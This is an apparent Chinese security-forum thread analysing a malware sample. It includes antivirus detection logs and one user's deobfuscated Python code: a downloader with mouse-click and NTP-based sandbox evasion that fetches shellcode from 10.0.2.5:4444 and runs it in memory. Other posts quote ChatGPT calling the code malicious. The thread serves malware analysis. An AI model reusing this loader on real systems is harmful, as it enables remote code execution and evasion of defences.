连接网络的还混淆代码的屑

761773275

ATC

1. 高级威胁防护阻止了一个恶意进程。进程路径: virus.exe.
   
2. 威胁名称: ATC.SuspiciousBehavior.4596B61602BFE6A6.

复制代码

aboringman

1. 2023/1/31 19:37:26        D:\测试专用\virus\virus.exe|>virus [L] Multi:Agent-BD [Trj] (0)

复制代码

GreatMOLA

Norton
C杀

a27573

1. 
   
2. import urllib.request, string, random, ctypes
   
3. import multiprocessing
   
4. n_cpu_count = multiprocessing.cpu_count()
   
5. if n_cpu_count >= 2:
   
6.             import win32api
   
7.             a = 0
   
8.             b = 1
   
9.             while a < b:  # 推测为鼠标点击反沙盒
   
10.                         c = win32api.GetAsyncKeyState(1) # VK_LBUTTON 鼠标左键
    
11.                         d = win32api.GetAsyncKeyState(2) # VK_RBUTTON 鼠标右键
    
12.                         if c % 2 == 1:
    
13.                                     a += 1
    
14.                         if d % 2 == 1:
    
15.                                     a += 1
    
16.             if a >= b:
    
17.                         from time import sleep
    
18.                         from socket import AF_INET, SOCK_DGRAM
    
19.                         import sys
    
20.                         import datetime
    
21.                         import time
    
22.                         import socket
    
23.                         import struct
    
24.                         client = socket.socket(AF_INET, SOCK_DGRAM)
    
25.                         client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))
    
26.                         msg, address = client.recvfrom( 1024 )
    
27.                         e = datetime.datetime.fromtimestamp(struct.unpack("!12I",msg)[10] - 2208988800)
    
28.                         sleep(10)  # sleep反沙盒
    
29.                         client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))
    
30.                         msg, address = client.recvfrom( 1024 )
    
31.                         if ((datetime.datetime.fromtimestamp((struct.unpack("!12I",msg)[10] - 2208988800)) - e).seconds >= 10):  # 利用ntp服务器判断是否sleep了足够时间，检测沙盒时间加速
    
32.                                     def func1(s): return sum([ord(ch) for ch in s]) % 0x100
    
33.                                     def func2():
    
34.                                         for x in range(64):
    
35.                                                             f = ''.join(random.sample(string.ascii_letters + string.digits,3))
    
36.                                                             g = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
    
37.                                                             for i in g:
    
38.                                                                         if func1(f + i) == 92: return f + i
    
39.                                     def request_http_content(domain, port):
    
40.                                                 proxy_handler = urllib.request.ProxyHandler({})
    
41.                                                 opener = urllib.request.build_opener(proxy_handler)
    
42.                                                 urllib.request.install_opener(opener)
    
43.                                                 req = urllib.request.Request("http://" + domain + ":" + str(port) + "/" + func2(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})
    
44.                                                 try:
    
45.                                                             r = urllib.request.urlopen(req)
    
46.                                                             try:
    
47.                                                                         if int(r.info()["Content-Length"]) > 100000: return r.read()
    
48.                                                                         else: return ''
    
49.                                                             except: return r.read()
    
50.                                                 except urllib.request.URLError:
    
51.                                                             return ''
    
52.                                     def exec_shellcode(payload):
    
53.                                                 if payload != "":
    
54.                                                             buf = bytearray(payload)
    
55.                                                             base_address = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(buf)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    
56.                                                             c_char_array = (ctypes.c_char * len(buf)).from_buffer(buf)
    
57.                                                             ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(base_address),c_char_array, ctypes.c_int(len(buf)))
    
58.                                                             handle_thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(base_address),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    
59.                                                             ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle_thread),ctypes.c_int(-1))
    
60.                                     payload = ''
    
61.                                     payload = request_http_content("10.0.2.5", 4444)
    
62.                                     exec_shellcode(payload)
    

复制代码

你看看，这样是不是就简单易懂，一目了然了？

从10.0.2.5:4444加上一个满足简单hash的4位字符串的url里下载了一段shellcode，创建线程并运行

然后这个10.0.2.5是局域网地址，说明这个脚本要配合其他组件才能运行




非常常见的downloader了

wangrui6666

杰伦Ｊ时代 发表于 2023-1-31 17:31
还是这个版本好，界面简洁，看着舒适，就是听说这个版本没有kis21.9引擎新啊

是啊，一点没错，我每天都会上365看看有没有新版本发布呢，哈哈

python无名氏

a27573 发表于 2023-1-31 20:50
你看看，这样是不是就简单易懂，一目了然了？

从10.0.2.5:4444加上一个满足简单hash的4位字符串的url ..

谢谢大佬！

wwwab

刚刚考了考ChatGPT，然后它反复对我说请不要在你的计算机上运行这段代码

这是一段恶意脚本，它的目的是在 Windows 系统上执行恶意操作。它可以监测鼠标和键盘的状态，并通过向指定的 URL 发送请求以获取恶意代码。然后，它会加载并执行这些恶意代码。请不要在你的计算机上运行这段代码。

This code is a malicious script. It appears to contain some functionalities that can be considered as harmful. For example, it checks if there are at least two CPU cores available, and if so, it waits for a certain key combination to be pressed. If the key combination is pressed, it performs a number of actions, including sending an NTP request and downloading data from a server using a custom URL. The data downloaded from the server is then executed by allocating memory in the process and copying the data into it. This code may cause harm to your computer or network and it is not recommended to run it.

wwwab

python无名氏 发表于 2023-2-1 10:28
谢谢大佬！

From ChatGPT：

This code appears to be malicious, as it uses multiple libraries and techniques that are commonly used in malicious software. For example, it uses the win32api library to monitor keyboard events, urllib to make HTTP requests to remote servers, and ctypes to allocate memory in the Windows operating system. The code also uses random number generation, string manipulation, and network communication, which could potentially be used to gather sensitive information or compromise the security of the host system. I would advise against executing this code on any systems that you control.

This code appears to be malicious in nature. It's checking the number of CPU cores and, if the number is greater than or equal to 2, it uses the win32api module to monitor keyboard events. If certain conditions are met, the code opens a socket connection and sends a message to a specified network time protocol server. This is likely part of a malicious payload that is attempting to gain information or execute actions on the targeted system. It's not recommended to run this code or allow it to execute on your system.

python无名氏

wwwab 发表于 2023-2-10 14:07
刚刚考了考ChatGPT，然后它反复对我说请不要在你的计算机上运行这段代码

求ChatGPT的token(key)我整了好久都没搞到，听说要钱，还得弄个国外手机号，也要钱...第一次做伸手党，望批准

wwwab

python无名氏 发表于 2023-2-10 19:46
求ChatGPT的token(key)我整了好久都没搞到，听说要钱，还得弄个国外手机号，也要钱...第一次做伸手 ...

不行啊，我只有一个好不容易搞来的账号，调用api貌似是按照字数收费，每个账号只有18美金的体验额度用完就要充钱而且还很麻烦，有人没几天就花完用光了额度